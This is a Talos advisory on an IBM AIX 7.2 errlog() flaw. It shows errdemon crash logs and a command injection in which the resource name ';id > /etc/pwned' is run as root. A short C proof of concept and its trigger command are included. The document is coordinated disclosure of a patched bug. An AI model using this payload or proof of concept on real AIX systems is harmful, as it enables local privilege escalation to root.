Talos Vulnerability Report

TALOS-2023-1690

IBM Corporation AIX errlog() Log Injection Vulnerability

April 24, 2023

CVE Number

None,CVE-2023-26286

SUMMARY

An OS command injection vulnerability exists in the errlog() syscall functionality of IBM Corporation AIX 7.2. A specially crafted syscall can lead to execute privileged operation. An attacker can execute arbitrary commands to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

IBM Corporation AIX 7.2

PRODUCT URLS

AIX - <http://us.ibm.com>

CVSSv3 SCORE

5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-117 - Improper Output Neutralization for Logs

DETAILS

AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.

Research into the attack surface presented by the errlog() syscall has identified 3 potential areas of concern.

It should be noted that these events will likely be onboarded into the system operator’s wider monitoring infrastructure. Being able to inject arbitrary events will allow attackers to actively mislead defenders as to the current operational state of the platform.

Malformed input leading to memory corruption

Certain combinations of values supplied in the err_rec structure via the error_id, resource_name and detail_data properties to the errlog() syscall can result in out-of-bounds memory access when the events are processed by the errdemon process.

Crash Information

…   
LABEL: CORE_DUMP   
IDENTIFIER: A924A5FC

Date/Time: Mon Mar 23 23:54:21 BST 2020   
Sequence Number: 22952   
Machine Id: 00CA1BFD4C00   
Node Id: beehive   
Class: S   
Type: PERM   
WPAR: Global   
Resource Name: SYSPROC

Description   
SOFTWARE PROGRAM ABNORMALLY TERMINATED

Probable Causes   
SOFTWARE PROGRAM

User Causes   
USER GENERATED SIGNAL

Recommended Actions   
CORRECT THEN RETRY

Failure Causes   
SOFTWARE PROGRAM

Recommended Actions   
RERUN THE APPLICATION PROGRAM   
IF PROBLEM PERSISTS THEN DO THE FOLLOWING   
CONTACT APPROPRIATE SERVICE REPRESENTATIVE

Detail Data   
SIGNAL NUMBER   
11   
USER’S PROCESS ID:   
7929890   
FILE SYSTEM SERIAL NUMBER   
4   
INODE NUMBER   
0 4   
CORE FILE NAME   
/var/adm/ras/core   
PROGRAM NAME   
lfailaiocachelv   
STACK EXECUTION DISABLED   
0   
COME FROM ADDRESS REGISTER

PROCESSOR ID   
hw_fru_id: 0   
hw_cpu_id: 0

ADDITIONAL INFORMATION   
strlen 0   
_doprnt 7574   
vsnprintf 150   
lvmt_entr 104   
lvmt 124   
main 784   
__start 6C

Symptom Data   
REPORTABLE   
1   
INTERNAL ERROR   
1   
SYMPTOM CODE   
PIDS/5765E6200 LVLS/520 PCSS/SPI2 FLDS/lfailaioc SIG/11 FLDS/strlen VALU/0 FLDS/main   
—————————————————————————   
LABEL: LVM_CLV_FAIL_DONE   
IDENTIFIER: 30097641

Date/Time: Tue Mar 24 00:06:35 BST 2020 Sequence Number: 22981 Machine Id: 00CA1BFD4C00 Node Id: beehive Class: S Type: INFO WPAR: Global Resource Name: M6UHAE3).JSJXRD$NONE

Description AIO CACHE FAIL RECOVERY DONE

Recommended Actions If asynchronous IO cache is marked as invalid then using chmp command disable the asynchronous mirroring for a volume group. Synchronize all the logical volume copies. Delete a old aio_cache type logical volume. Create a new aio_cache type logical volume. Setup an asynchronous mirroring using new aio_cache type logical volume.

Detail Data AIO CACHE DEVICE MAJOR/MINOR

MIRROR POOL ID

VOLUME GROUP ID ```

Output from truss for the crash is as follows:

7929890: 42664157: kopen(“/var/adm/ras/errlog”, O_RDONLY) = 5   
7929890: 42664157: lseek(5, 0, 0) = 0   
7929890: 42664157: kread(5, “ a e r r l o g r\0\0\0 ▒”.., 32) = 32   
7929890: 42664157: lseek(5, 0, 0) = 0   
7929890: 42664157: _lockf(5, 1, 0) Err#9 EBADF   
7929890: 42664157: lseek(5, 0, 0) = 0   
7929890: 42664157: kread(5, “ a e r r l o g r\0\0\0 ▒”.., 32) = 32   
7929890: 42664157: lseek(5, 281112, 0) = 281112   
7929890: 42664157: kread(5, “\0\010 ▒”, 4) = 4   
7929890: 42664157: lseek(5, 276857, 0) = 276857   
7929890: 42664157: kread(5, “\0\010 ▒”, 4) = 4   
7929890: 42664157: kread(5, “\f M ▒ 4\0\0 Y ▒ ^ y >1D”.., 4255) = 4255   
7929890: 42664157: lseek(5, 276853, 0) = 276853   
7929890: 42664157: kread(5, “\0\010 ▒”, 4) = 4   
7929890: Received signal #11, SIGSEGV [default]   
7929890: _**process killed**_

#### CVE-2023-26286 - Malformed input leading to direct command injection

The most critical vulnerability can be triggered using the example code to generate an error with an ID of `ERRID_CORRUPT_LOG` with a `resource_name` of `;id > /etc/pwned`. The resource name is used by `errdemon` to process events that have been written to `/dev/error`.

As can be seen in the snippet below, taken from a truss-based recording of the errdemon process’s activity, the supplied resource name value is used to construct the command passed into `execve()`. This results in it being executed as the root user:

execve(“/usr/bin/sh”, …);   
argv: sh -c /usr/lib/physloc ;id > /etc/pwned

#### Exploit Proof of Concept

The most trivial method of exploitatation to gain command execution takes the following form:

int main(int argc, char **argv) { struct err_rec mal_vec; mal_rec.error_id = ERRID_CORRUPT_LOG; // this can be any valid error ID that has been registered, but the choice can affect how it is processed by errdaemon strcpy(mal_rec.resource_name, argv[1]); errlog((void *) &mal_rec, sizeof(unsigned int) + ERR_NAMESIZE); }

Once the event has been submitted with `errlog()`, it is then exposed on `/dev/error` for processing.

For example:

./logpop “;id > /etc/pwned”

This results in `/etc/pwned` being created with root privileges and populated with the output of the `id` command when the event is processed by `errdemon`.

##### TIMELINE

2023-01-09 - Initial Vendor Contact   
2023-01-16 - Vendor Disclosure   
2023-04-13 - Vendor Patch Release   
2023-04-24 - Public Release

##### Credit

Discovered by Tim Brown of Cisco Security Advisory EMEAR.

* * *

Vulnerability Reports Next Report

TALOS-2023-1691

Previous Report

TALOS-2022-1593